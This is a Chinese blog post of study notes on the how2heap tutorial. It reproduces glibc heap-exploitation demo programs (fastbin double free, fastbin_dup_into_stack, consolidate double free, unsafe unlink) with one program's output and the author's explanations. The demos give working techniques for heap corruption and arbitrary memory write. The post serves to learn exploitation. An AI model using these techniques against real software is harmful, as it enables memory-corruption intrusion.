how2heap学习笔记(1)

最新推荐文章于 2024-02-14 13:06:17 发布
最新推荐文章于 2024-02-14 13:06:17 发布
阅读量2.2k 收藏 4
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41617275/article/details/85270356
版权
pwn 同时被 2 个专栏收录
18 篇文章 1 订阅
订阅专栏
3 篇文章 0 订阅
订阅专栏
fastbinsmallbinlargebinunsortedbiin
x8616~8016~512512~
x6432~16032~10241024~

linux堆内存深入理解

1.first_fit.c
就是堆的先进后出,malloc取最近free的大小大于请求的chunk,不是fastbin,fastbin没有最低位显示前一块。

2.fastbin_dup.c

#include <stdio.h>
#include <stdlib.h>

int main()
{
	fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\n");

	fprintf(stderr, "Allocating 3 buffers.\n");
	int *a = malloc(8);
	int *b = malloc(8);
	int *c = malloc(8);

	fprintf(stderr, "1st malloc(8): %p\n", a);
	fprintf(stderr, "2nd malloc(8): %p\n", b);
	fprintf(stderr, "3rd malloc(8): %p\n", c);

	fprintf(stderr, "Freeing the first one...\n");
	free(a);

	fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
	// free(a);

	fprintf(stderr, "So, instead, we'll free %p.\n", b);
	free(b);

	fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
	free(a);

	fprintf(stderr, "Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
	fprintf(stderr, "1st malloc(8): %p\n", malloc(8));
	fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
	fprintf(stderr, "3rd malloc(8): %p\n", malloc(8));
}

在glibc版本2.28上失败,在2.19版本成功,ubuntu14.04。
只要不在free链头就可以free,也就是double free。

3.fastbin_dup_into_stack.c

#include <stdio.h>
#include <stdlib.h>

int main()
{
	fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
	       "returning a pointer to a controlled location (in this case, the stack).\n");

	unsigned long long stack_var;

	fprintf(stderr, "The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);

	fprintf(stderr, "Allocating 3 buffers.\n");
	int *a = malloc(8);
	int *b = malloc(8);
	int *c = malloc(8);

	fprintf(stderr, "1st malloc(8): %p\n", a);
	fprintf(stderr, "2nd malloc(8): %p\n", b);
	fprintf(stderr, "3rd malloc(8): %p\n", c);

	fprintf(stderr, "Freeing the first one...\n");
	free(a);

	fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
	// free(a);

	fprintf(stderr, "So, instead, we'll free %p.\n", b);
	free(b);

	fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
	free(a);

	fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
		"We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
	unsigned long long *d = malloc(8);

	fprintf(stderr, "1st malloc(8): %p\n", d);
	fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
	fprintf(stderr, "Now the free list has [ %p ].\n", a);
	fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
		"so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
		"so that malloc will think there is a free chunk there and agree to\n"
		"return a pointer to it.\n", a);
	stack_var = 0x20;

	fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
	*d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

	fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
	fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
}

这里可以简化为

unsigned long long *d = malloc(8);
stack_var = 0x20;
*d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
fprintf(stderr, "4th malloc(8): %p\n", malloc(8));

就是在围绕stack_var伪造一个fastbin堆块,由于fastbin是单链表,首先通过指针d修改chunk d的fd为stack_var地址的前8个字节,第一次malloc的时候分配的是块d,之后free链的头部变成fd指向的伪造的chunk,因此第二次malloc分配的是伪造的块,我们可以写的地方是&starck_var+8~&stack_var+16.

4.fastbin_dup_consolidate.c

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int main() {
  void* p1 = malloc(0x40);
  void* p2 = malloc(0x40);
  fprintf(stderr, "Allocated two fastbins: p1=%p p2=%p\n", p1, p2);
  fprintf(stderr, "Now free p1!\n");
  free(p1);

  void* p3 = malloc(0x400);
  fprintf(stderr, "Allocated large bin to trigger malloc_consolidate(): p3=%p\n", p3);
  fprintf(stderr, "In malloc_consolidate(), p1 is moved to the unsorted bin.\n");
  free(p1);
  fprintf(stderr, "Trigger the double free vulnerability!\n");
  fprintf(stderr, "We can pass the check in malloc() since p1 is not fast top.\n");
  fprintf(stderr, "Now p1 is in unsorted bin and fast bin. So we'will get it twice: %p %p\n", malloc(0x40), malloc(0x40));
}

首先申请了两块fastbin,free了p1,然后申请了0x400属于largebin,
申请0x400前chunk1和chunk2属于fastbin:

00x51
00
padpad
00x51
00
padpad

申请后:

00x51
0x00007ffff7dd37f80x00007ffff7dd37f8
padpad
00x51
00
padpad

查看了下0x00007ffff7dd37f8,是main_arena中,应该是largebins,先不管。
此时内存中堆结构从低到高是p1/p2/p3。此时p1指向的chunk已free归为largebins,因为申请largebin时会查看是否有free的fastchunk,若有,则会归入largebins。因为p1指向的块并不是topchunk,可以再次free,触发double free。
说下,堆顶始终有个largebins,size为剩余的空间,他会和free的,与他相邻的largechunk合并。

5.unsafe_unlink.c

源码:

uint64_t *chunk0_ptr;

int main()
{
	fprintf(stderr, "Welcome to unsafe unlink 2.0!\n");
	fprintf(stderr, "Tested in Ubuntu 14.04/16.04 64bit.\n");
	fprintf(stderr, "This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n");
	fprintf(stderr, "The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.\n");

	int malloc_size = 0x80; //we want to be big enough not to use fastbins
	int header_size = 2;

	fprintf(stderr, "The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.\n\n");

	chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
	uint64_t *chunk1_ptr  = (uint64_t*) malloc(malloc_size); //chunk1
	fprintf(stderr, "The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
	fprintf(stderr, "The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);

	fprintf(stderr, "We create a fake chunk inside chunk0.\n");
	fprintf(stderr, "We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.\n");
	chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
	fprintf(stderr, "We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.\n");
	fprintf(stderr, "With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False\n");
	chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
	fprintf(stderr, "Fake chunk fd: %p\n",(void*) chunk0_ptr[2]);
	fprintf(stderr, "Fake chunk bk: %p\n\n",(void*) chunk0_ptr[3]);

	fprintf(stderr, "We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.\n");
	uint64_t *chunk1_hdr = chunk1_ptr - header_size;
	fprintf(stderr, "We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n");
	fprintf(stderr, "It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly\n");
	chunk1_hdr[0] = malloc_size;
	fprintf(stderr, "If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x90, however this is its new value: %p\n",(void*)chunk1_hdr[0]);
	fprintf(stderr, "We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.\n\n");
	chunk1_hdr[1] &= ~1;

	fprintf(stderr, "Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.\n");
	fprintf(stderr, "You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344\n\n");
	free(chunk1_ptr);

	fprintf(stderr, "At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.\n");
	char victim_string[8];
	strcpy(victim_string,"Hello!~");
	chunk0_ptr[3] = (uint64_t) victim_string;

	fprintf(stderr, "chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.\n");
	fprintf(stderr, "Original value: %s\n",victim_string);
	chunk0_ptr[0] = 0x4141414142424242LL;
	fprintf(stderr, "New Value: %s\n",victim_string);
}

运行结果如下:

Welcome to unsafe unlink 2.0!
Tested in Ubuntu 14.04/16.04 64bit.
This technique can be used when you have a pointer at a known location to a region you can call unlink on.
The most common scenario is a vulnerable buffer that can be overflown and has a global pointer.
The point of this exercise is to use free to corrupt the global chunk0_ptr to achieve arbitrary memory write.

The global chunk0_ptr is at 0x602070, pointing to 0x603010
The victim chunk we are going to corrupt is at 0x6030a0

We create a fake chunk inside chunk0.
We setup the 'next_free_chunk' (fd) of our fake chunk to point near to &chunk0_ptr so that P->fd->bk = P.
We setup the 'previous_free_chunk' (bk) of our fake chunk to point near to &chunk0_ptr so that P->bk->fd = P.
With this setup we can pass this check: (P->fd->bk != P || P->bk->fd != P) == False
Fake chunk fd: 0x602058
Fake chunk bk: 0x602060

We assume that we have an overflow in chunk0 so that we can freely change chunk1 metadata.
We shrink the size of chunk0 (saved as 'previous_size' in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.
It's important that our fake chunk begins exactly where the known pointer points and that we shrink the chunk accordingly
If we had 'normally' freed chunk0, chunk1.previous_size would have been 0x90, however this is its new value: 0x80
We mark our fake chunk as free by setting 'previous_in_use' of chunk1 as False.

Now we free chunk1 so that consolidate backward will unlink our fake chunk, overwriting chunk0_ptr.
You can find the source of the unlink macro at https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;h=ef04360b918bceca424482c6db03cc5ec90c3e00;hb=07c18a008c2ed8f5660adba2b778671db159a141#l1344

At this point we can use chunk0_ptr to overwrite itself to point to an arbitrary location.
chunk0_ptr is now pointing where we want, we use it to overwrite our victim string.
Original value: Hello!~
New Value: BBBBAAAA

画张图分析下:
在这描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述在这里插入图片描述
一开始没想明白,后来知道libc寻找chunk是按照物理地址后一块的地址减去presize得到,所以freechunk1时会修改指向chunk0头的指针.

6.house_of_spirit
就是在栈上构造两个fast_chunk,绕过fd,bk检查,因为会检查后一块chunk的preinuse位是否为1。然后通过指向他们的指针进行释放和申请,达到写此块地址的目的。第二块起作用的地方就是块头的符号位,试了下,若没有第二块则会崩溃。

7.poison_null_byte
malloc块大小,总结就是:prev_size的空间可以借给上一个chunk作为可用空间,所以要用malloc_usable_size()获取实际大小。这个在libc-2.19上跑失败了,应该加了保护,先不管.

发蝴蝶和大脑斧
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
how2heap:一个用于学习各种堆利用技术的存储库
04-05
此仓库用于学习各种堆利用技术。 我们使用Ubuntu的Libc版本作为黄金标准。 每种技术均已验证可在相应的Ubuntu版本上使用。 您可以运行apt source libc6来下载您在基于Debian的操作系统上使用的Libc的源代码。 我们...
how2heap 深入学习(1)
CoLin的pwn小屋
02-10 2695
how2heap glibc 2.23学习
从0开始how2heap(1(讲一些基础和我入门时的感受,没啥干货,非入门直接跳过即可))#施工中,还有些自相矛盾的地方
m0_50526323的博客
05-30 626
一.开始之前 (与主题无关,看干货直接跳过一些即可) 1.安装Ubuntu16.04 虚拟机 2.安装pwndbg git clone https://github.com/pwndbg/pwndbg cd pwndbg sudo ./setup.sh 输入 gdb 后出现如下,说明安装成功, 若失败则在home中: sudo vim ./.gdbinit 添加如下路径,并注释其余 source /home/yourname/pwndbg/gdbinit.py 二.first_fit ps:代码一行太
从零开始学howtoheap:解题西湖论剑Storm_note
最新发布
weixin_44626085的博客
02-14 1148
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习
how2heap-2.23-15-house_of_einherjar
blind cat
01-08 381
时,想着在被poison_null_byte的chunk上方进行布局利用,当时想到的利用方式原来就是这个。
how2heap_house_of_einherjar
huzai9527的博客
05-30 156
house of einherjar 1. 利用原理 两个物理相邻的 chunk 会共享 prev_size字段,尤其是当低地址的 chunk 处于使用状态时,高地址的 chunk 的该字段便可以被低地址的 chunk 使用。因此,我们有希望可以通过写低地址 chunk 覆盖高地址 chunk 的 prev_size 字段。 一个 chunk PREV_INUSE 位标记了其物理相邻的低地址 chunk 的使用状态,而且该位是和 prev_size 物理相邻的。 后向合并时,新的 chunk 的
C++复习整理---指针、函数、const相关
DannieG的博客
10-13 124
指针int *p p:p指向的地址 *p:p指向的地址上的值 &p:存放指针p的地址 const const int p int const p 这两个相同的 指向整型常量的指针,指向的位置的值不能改变,可以改指针本身。理解成先const int或int const,再为指针。 就可以让这个指针指向有另一个值的另一个位置。 如果想要在同一个位置改值,就可以先让另一个指针指向这个位置,然后再从另一个指针改值。 比如: int u = (int)p;//得有(int),不然会提示是const int*
ion_heap.rar_ION_V2 _heap
09-19
ion heap ion heap create for Linux v2.13.6.
JProfiler学习笔记
01-25
它让你得以对heap walker作资源回收器的root analysis,可以轻易找出内存漏失;heap快照(snapshot)模式让未被参照(reference)的对象、稍微被参照的对象、或在终结(finalization)队列的对象都会被移除;整合...
api-ms-win-core-heap-l2-1-0(64-Bit).zip
11-27
64位的api-ms-win-core-heap-l2-1-0.dll,解决计算机中丢失api-ms-win-core-heap-l2-1-0.dll的问题。
How2Heap笔记(一)
kelxLZ的博客
01-21 2401
Author:ZERO-A-ONE Date:2021-01-21 ​ “how2heap”是shellphish团队在Github上开源的堆漏洞系列教程。上面有很多常见的堆漏洞教学示例,实现了以下技术: File Technique Glibc-Version Patch Applicable CTF Challenges first_fit.c Demonstrating glibc malloc’s first-fit behavior. calc_tcache_idx..
how2heap2.31学习(1)
m0_51251108的博客
09-30 595
how2heap里的libc2.31的fastbin部分
how2heap注意点总结-上
九层台
03-11 913
1.chunk的申请机制,在申请chunk的时候满足first-fit算法(从unsorted bin中遍历遇到第一个比需要chunk大的chunk切割,然后遍历unsorted bin链对应chunk放入对应位置) (所需chunk大小大于small bin或者small bin中没有找到恰好满足的chunk大小,或者fastbin中没有找到合适的chunk大小会引起fast bins遍历合并放...
how2heap学习笔记
weixin_30394251的博客
10-11 1067
github源代码地址 这里只分析glibc2.25堆分配的特性,为了方便调试编译时使用 gcc -g -no-pie <input_file_name> -o <output_file_name> 0.fastbin_dup_consolidate   glibc在分配一个large chunk时会先检查是否存在fastbins,如果存在则合并fastbi...
pwn学习-how2heap-fastbin_dup
qq_39153247的博客
08-20 1392
今天打完比赛身心疲惫,来复习复习把,写一点简单的把   之所以记录一下fastbin,是因为现阶段我能接触到最多的就是它了。   fastbins: 程序中总是会分配一些比较小的堆块,对于这些堆块来说,如果我们直接将他们合并,那么下次申请的时候还需要重新切割出来,降低了运行的效率,所以ptmalloc设计了fastbins. fastbins共有10个bin,分别是8-80字节,依次增...
how2heap 深入学习(2)
CoLin的pwn小屋
02-12 731
glibc 2.23源码分析系列之house_of_mind_fastbin + house of orange
glibc-2.27-how2heap学习
qq_40712959的博客
03-26 727
学习参考how2heap,主要用于理解不同版本glibc机制 fastbin_dup #include <stdio.h> #include <stdlib.h> #include <assert.h> int main() { setbuf(stdout, NULL); printf("This file demonstrates a simple double-free attack with fastbins.\n"); printf("Fill up
how2heap 1-4
WHOISjxb的博客
04-06 473
文章目录1. First_fit.c2. Fastbin_dup.c 64位系统以下各字段均为8字节,32位系统为4字节。 glibc2.26及以上版本有tcache机制。咱目前也不太懂,快刀斩乱麻,glibc2.25的实验在Ubuntu16.04上做,glibc版本信息如下: 1. First_fit.c 运行结果: 分析: 新版的how2heap这里改为0x512、0x256(十六进制...
api-ms-win-core-heap-l2-1-0
01-22
根据提供的引用内容,api-ms-win-core-heap-l2-1-0是一个系统动态库文件,它可能会在某些情况下丢失或缺少。为了解决这个问题,你可以尝试以下解决方案: 1. 下载并安装vc++2015运行库:这是一个常见的解决方案,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值